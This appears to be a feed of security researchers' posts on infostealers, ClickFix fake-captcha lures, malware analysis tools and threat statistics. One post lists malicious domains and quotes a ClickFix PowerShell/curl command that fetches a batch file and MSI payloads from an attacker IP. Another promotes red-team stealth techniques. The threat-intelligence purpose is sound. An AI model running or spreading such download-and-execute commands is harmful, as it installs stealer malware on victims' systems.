ExecuteMalware

Disruption ≠ obliteration. Lumma remains one of the most profitable stealers, running both the stealer and its own log market. It’s not Redline or Meta. Even if it gets taken down, expect a rebrand and fresh infrastructure. This ecosystem doesn’t die - it changes.

Lumma infostealer malware returns after law enforcement disruption - @billtoulas bleepingcomputer.com/news/security/…

#BREAKING #ESETresearch can confirm the news of #Lumma Stealer's revival. ESET telemetry and botnet tracking show that operators are rebuilding their infrastructure, with their renewed activity reaching similar levels to those before the #disruption in May 2025. 1/6

A website impersonating a popular streaming service uses an "influencer collaboration" theme to trick viewers into running a malicious Windows shortcut for a multi-stage chain, including a WebDAV server, to push #Vidar #infostealer malware. Details at: bit.ly/456t2ET

Most folk who follow me have seen me chat about Malcat. If you aren't familiar: It is a fairly inexpensive tool for malware analysis and RE that is super powerful. My favorite tool by far. The developer is doing a stream next week, something well worth catching.

+ bookingcomplaint-id8873\.live complaintsub{81273,81275}\.com id33kpartnet\.com reported-id6736\.com revers-id-{372,732,837}extranet\.com visitor{3304,372484,86326,885061,9204}\.help

#booking #clickfix #fakecaptcha visitor31740].help 👇 powershell -c "Invoke-WebRequest -Uri '95.164.55.]176:5554/kalik.bat' 👇curl 95.164.55.176:5554 👇 kalik.bat 👇 JPERGDUP.msi STZIAZID.msi Samples bazaar.abuse.ch/browse/tag/95-… AnyRun app.any.run/tasks/65aa50fa… cc @500mk500 @k3dg3

Binary Ninja 5.1 is now released: binary.ninja/2025/07/24/5.1… - New WARP function matching - Pseudo Objective-C - Binexport plugin built-in - IL Rewriting Examples, APIs, and Docs - Arch: PPC VLE, mips-r5900, x32 + Much more!

🚨 Control-Flow Flattening Obfuscated #JavaScript Drops #SnakeKeylogger. The #malware uses layered obfuscation to hide execution logic and evade traditional detection. ⚠️ Our data shows banking is the most affected sector among our users, nearly matching all the other industries…

100 Days of YARA, YARA Rule Tips and The Current State of Email borne Threats with Greg Lesnewich x.com/i/broadcasts/1…

#MythStealer HTTP Request Details app.any.run/tasks/25c854e2…

Just a heads-up, attackers found a way to leak information, including keys entirely from memory. Checking for "the file" is not enough to assess compromise and warrant key rotation anymore. Just rotate your keys if you were exposed, period.

This mitigation is critical (esp based on Storm-2603 exploitation) and I expect it’s most-likely to be overlooked: 🔃🔑 Rotate SharePoint Server ASP .NET machine keys • After applying the latest security updates above or enabling AMSI, it is critical that customers rotate…

Phishing activity in the past 7 days 🐟 Track latest #phishing threats in TI Lookup: intelligence.any.run/analysis/looku…

🎯 Business security requires addressing diverse threats, from mobile #malware to Python-based stealers. Equip your team with real-time analysis and full visibility across Windows, Linux, and Android to accelerate detection & response: any.run/demo?utm_sourc…

🔥 Ready for this week's live stream with Greg Lesnewich... youtube.com/live/JIxbM82hW…

Top 10 last week's threats by uploads 🌐 ⬆️ #Lumma 635 (628) ⬇️ #Xworm 282 (369) ⬆️ #Zombie 216 (176) ⬇️ #Snake 200 (306) ⬇️ #Asyncrat 183 (238) ⬇️ #Remcos 163 (317) ⬆️ #Amadey 153 (111) ⬇️ #Agenttesla 148 (175) ⬆️ #Njrat 147 (106) ⬇️ #Dcrat 129 (186) Track them all:…

#ClickFix went from virtually non-existent to the second most common attack vector blocked by #ESET, surpassed only by #phishing. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. #ESETresearch 1/7

Exciting! @vector35's excellent #BinaryNinja ships with built-in BinExport in the latest dev version! Here's how to use it with #BinDiff: dev-docs.binary.ninja/guide/binexpor…

Video: Introduction to Beacon Object Files (BOFs)! Executing native code in-memory and at runtime to improve red team stealth. 😎 We start small to understand Dynamic Function Resolution and create a small Empire module to call Win32 API functions! youtu.be/p3fByg8pa1g